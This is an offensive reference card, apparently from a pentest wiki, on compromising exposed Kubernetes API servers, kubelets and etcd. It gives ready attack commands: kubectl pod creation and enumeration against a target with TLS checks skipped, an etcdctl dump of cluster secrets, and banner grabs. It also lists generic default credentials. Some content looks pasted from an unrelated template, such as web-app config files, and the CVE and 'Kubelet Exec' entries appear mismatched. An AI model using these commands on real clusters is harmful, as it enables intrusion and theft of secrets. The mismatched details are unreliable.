Kubernetes
Aliases: Kubernetes, K8s, Kube
Kubernetes is a container orchestration platform. Exposed API server and kubelet ports allow pod creation, command execution, and cluster compromise.
Ports
| Port | Protocol | Description |
|---|---|---|
| 6443 | tcp | Kubernetes API |
| 10250 | tcp | Kubelet API |
| 10255 | tcp | Kubelet (read-only) |
| 2379 | tcp | etcd |
Fingerprints
| Banner / Probe | Expected Response |
|---|---|
| nmap -sV -p <port> <target> | Service banner and version info |
| nc -nv <target> <port> | Raw banner grab |
Key Files
| Path | Description |
|---|---|
| .env | Environment variables with API keys and DB creds |
| config.php | Application configuration file |
| wp-config.php | WordPress database credentials |
| web.config | IIS configuration file |
| .git/config | Git repository configuration |
| robots.txt | Disallowed paths (information disclosure) |
| sitemap.xml | URL structure enumeration |
Default Credentials
| Username | Password | Context |
|---|---|---|
| admin | admin | Generic admin account |
| root | root | Generic root account |
Known CVEs
| Identifier | Type | Description |
|---|---|---|
| CVE-2024-3727 | RCE | Kubelet API auth bypass |
Exploitation Primitives
| Technique | Tool / Command | Result |
|---|---|---|
| Kubelet Exec | kubectl --server=https://<target>:6443 --insecure-skip-tls-verify run --image=alpine test -- sh | Pod creation |
| etcd Access | etcdctl --endpoints=http://<target>:2379 get / --prefix --keys-only | Read cluster secrets |
Notes
etcd stores the cluster's state, including Secrets and service account tokens. If etcd is reachable without authentication, the cluster is effectively compromised.
The kubelet API on 10250, when exposed with anonymous authentication enabled, allows running commands in any pod on that node without credentials.
Pod enumeration through an exposed API server: `kubectl --server=https://<target>:6443 --insecure-skip-tls-verify get pods --all-namespaces`
Seen on
Shodan, Censys, FOFA, ZoomEye